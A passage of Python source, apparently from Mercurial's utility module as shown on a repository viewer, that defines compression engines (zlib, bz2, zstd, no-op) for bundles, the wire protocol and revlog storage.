            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        ``role`` must be ``SERVERROLE`` or ``CLIENTROLE`` and selects which
        priority field is used for ordering.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return sorted(engines, key=getkey)

    def forwiretype(self, wiretype):
        """Obtain a compression engine registered to a wire proto identifier.

        Will raise KeyError if the wire type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3426 3425
class _zlibengine(compressionengine):
    # Compression engine built on the standard zlib module.

    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        # ``opts`` may carry a 'level' key; -1 is passed when it is absent.
        level = (opts or {}).get('level', -1)
        deflater = zlib.compressobj(level)

        for piece in it:
            packed = deflater.compress(piece)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if packed:
                yield packed

        yield deflater.flush()

    def decompressorreader(self, fh):
        def inflated():
            inflater = zlib.decompressobj()
            for pending in filechunkiter(fh):
                while pending:
                    # Limit output size to limit memory.
                    yield inflater.decompress(pending, 2 ** 18)
                    # Input that did not fit under the output limit is
                    # fed back in on the next round.
                    pending = inflater.unconsumed_tail

        return chunkbuffer(inflated())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            # Returns the compressed bytes, or None when the input is too
            # small or compression does not make it smaller.
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            if insize <= 1000000:
                compressed = zlib.compress(data)
                return compressed if len(compressed) < insize else None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            deflater = zlib.compressobj()
            parts = []
            step = 2**20
            for start in range(0, insize, step):
                parts.append(deflater.compress(data[start:start + step]))
            parts.append(deflater.flush())

            if sum(map(len, parts)) < insize:
                return ''.join(parts)
            return None

        def decompress(self, data):
            # zlib failures are reported to callers as RevlogError.
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
3513 3512
class _bz2engine(compressionengine):
    # Compression engine built on the standard bz2 module.

    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        # ``opts`` may carry a 'level' key; 9 is used when it is absent.
        level = (opts or {}).get('level', 9)
        packer = bz2.BZ2Compressor(level)
        for piece in it:
            packed = packer.compress(piece)
            # Skip the calls that produced no output yet.
            if packed:
                yield packed

        yield packer.flush()

    def decompressorreader(self, fh):
        def unpacked():
            unpacker = bz2.BZ2Decompressor()
            for piece in filechunkiter(fh):
                yield unpacker.decompress(piece)

        return chunkbuffer(unpacked())

compengines.register(_bz2engine())
3556 3555
class _truncatedbz2engine(compressionengine):
    # Decompression-only engine for bz2 streams stored without their
    # leading 'BZ' bytes.

    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        # No user-facing bundle spec name, only the internal identifier.
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def unpacked():
            unpacker = bz2.BZ2Decompressor()
            # The input stream doesn't have the 'BZ' header. So add it back.
            unpacker.decompress('BZ')
            for piece in filechunkiter(fh):
                yield unpacker.decompress(piece)

        return chunkbuffer(unpacked())

compengines.register(_truncatedbz2engine())
3577 3576
class _noopengine(compressionengine):
    # Engine that passes data through unchanged.

    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        # Nothing to do: hand back the very same iterator.
        return it

    def decompressorreader(self, fh):
        # Nothing to do: hand back the very same file object.
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # Always returns None.
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())
3612 3611
class _zstdengine(compressionengine):
    # Engine backed by the optional ``zstd`` module of this package.

    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
        except ImportError:
            return None
        return zstd

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = (opts or {}).get('level', 3)

        packer = self._module.ZstdCompressor(level=level).compressobj()
        for piece in it:
            packed = packer.compress(piece)
            # Skip the calls that produced no output yet.
            if packed:
                yield packed

        yield packer.flush()

    def decompressorreader(self, fh):
        dctx = self._module.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            # Slice sizes used when streaming large inputs through the
            # compressor and decompressor objects.
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            # Returns the compressed bytes, or None when the input is too
            # small or compression does not make it smaller.
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            if insize <= 1000000:
                compressed = self._cctx.compress(data)
                return compressed if len(compressed) < insize else None

            # Large input: feed it through a compressobj slice by slice.
            packer = self._cctx.compressobj()
            chunks = []
            start = 0
            while start < insize:
                stop = start + self._compinsize
                packed = packer.compress(data[start:stop])
                if packed:
                    chunks.append(packed)
                start = stop
            chunks.append(packer.flush())

            if sum(map(len, chunks)) < insize:
                return ''.join(chunks)
            return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                unpacker = self._dctx.decompressobj()
                chunks = []
                start = 0
                while start < insize:
                    stop = start + self._decompinsize
                    plain = unpacker.decompress(data[start:stop])
                    if plain:
                        chunks.append(plain)
                    start = stop
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                # Any failure is reported to callers as RevlogError.
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        level = (opts or {}).get('level', 3)
        return self.zstdrevlogcompressor(self._module, level=level)

compengines.register(_zstdengine())
3741 3740
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help.

    Returns a dict mapping each user-facing bundle compression name to an
    object whose ``__doc__`` is the formatted help text. Engines that are
    unavailable, or that declare no user-facing bundle name, are left out.
    """
    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    for name in compengines:
        engine = compengines[name]
        if not engine.available():
            continue

        spec = engine.bundletype()
        if not spec or not spec[0]:
            continue
        label = spec[0]

        origdoc = engine.bundletype.__doc__
        entry = docobject()
        entry.__doc__ = pycompat.sysstr('``%s``\n %s') % (label, origdoc)
        # Keep the untouched docstring and its function next to the
        # formatted text.
        entry._origdoc = origdoc
        entry._origfunc = engine.bundletype

        items[label] = entry

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace
General Comments 0
You need to be logged in to leave comments. Login now